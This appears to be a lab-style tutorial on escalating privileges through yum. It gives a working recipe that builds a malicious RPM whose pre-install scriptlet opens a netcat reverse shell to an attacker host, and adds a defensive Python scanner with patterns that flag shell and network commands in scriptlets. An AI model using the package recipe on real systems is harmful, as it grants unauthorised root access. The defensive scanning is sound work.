Further examples involving yum can be found on GTFOBins.
To leverage this vector, the user must be able to execute yum commands as a higher-privileged user (typically root).
A working example of this exploit can be found in the Daily Bugle room on TryHackMe.
In the following section, I will cover packaging a reverse shell into an RPM using fpm.
The example below creates a package that includes a before-install scriptlet (RPM's `%pre`) whose contents are an arbitrary script defined by the attacker. When the package is installed, the scriptlet runs with the privileges of the installing user, so the arbitrary command executes as root when yum is run as root. I've used a simple netcat reverse shell for demonstration, but the command can be changed as necessary.
```bash
EXPLOITDIR=$(mktemp -d)
# Command embedded in the package's before-install (%pre) scriptlet; placeholders must be filled in
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo "$CMD" > "$EXPLOITDIR/beforeinstall.sh"
# Package the temporary directory and attach the script as the before-install scriptlet
fpm -n "$RPMNAME" -s dir -t rpm -a all --before-install "$EXPLOITDIR/beforeinstall.sh" "$EXPLOITDIR"
```
Using the package built above, and assuming yum can be executed as a higher-privileged user:
- Transfer the RPM to the host
- Start a listener on your local host, such as a netcat listener matching the command embedded in the package
- Install the malicious package

```bash
yum localinstall -y exploited-1.0-1.noarch.rpm
```
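yum runs a package's scriptlets without displaying them, so the defensive counterpart to the procedure above is to inspect them first: `rpm -qp --scripts <file>.rpm` prints every scriptlet a package carries. The Python below is an added example (not part of the original post) that parses that output and flags scriptlets containing shell- or network-spawning commands; `SAMPLE_SCRIPTS` is a constructed sample of what the package built above would print, and the suspicious patterns are my own starting list.

```python
import re

# Constructed sample of `rpm -qp --scripts exploited-1.0-1.noarch.rpm`
# output for the package built above (not captured from a real run).
SAMPLE_SCRIPTS = """preinstall scriptlet (using /bin/sh):
nc -e /bin/bash <ATTACKER IP> <PORT>
postinstall scriptlet (using /bin/sh):
/sbin/ldconfig
"""

# Header line rpm prints for each scriptlet, e.g. "preinstall scriptlet (using /bin/sh):"
HEADER_RE = re.compile(r"^(\w+) scriptlet \(using ([^)]+)\):$")

# Patterns an install scriptlet has no legitimate reason to contain (assumed starting list).
SUSPICIOUS = [
    (r"\b(nc|ncat|netcat)\b", "netcat invocation"),
    (r"/dev/tcp/", "bash /dev/tcp socket"),
    (r"\b(ba)?sh -i\b", "interactive shell"),
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "download piped to shell"),
    (r"\bchmod\b.*(\bu\+s\b|\b[4-7][0-7]{3}\b)", "setuid/setgid bit"),
    (r"/etc/sudoers|/root/\.ssh", "sudo or SSH credential tampering"),
]

def parse_scriptlets(text):
    """Split `rpm -q --scripts` output into {name: (interpreter, body)}."""
    scriptlets = {}
    name = None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            name = m.group(1)
            scriptlets[name] = [m.group(2), []]
        elif name is not None:
            scriptlets[name][1].append(line)
    return {n: (interp, "\n".join(body).strip()) for n, (interp, body) in scriptlets.items()}

def find_suspicious(text):
    """Return [(scriptlet, reason, offending line)] for every line matching SUSPICIOUS."""
    hits = []
    for name, (_, body) in parse_scriptlets(text).items():
        for line in body.splitlines():
            for pattern, reason in SUSPICIOUS:
                if re.search(pattern, line):
                    hits.append((name, reason, line.strip()))
    return hits

if __name__ == "__main__":
    import sys
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_SCRIPTS
    for name, reason, line in find_suspicious(data):
        print(f"[!] {name}: {reason}: {line}")
```

On a real host, pipe `rpm -qp --scripts package.rpm` into the script; an empty result means no scriptlet matched the list, not that the package is safe, so still read the scriptlets by eye before installing anything from an untrusted source.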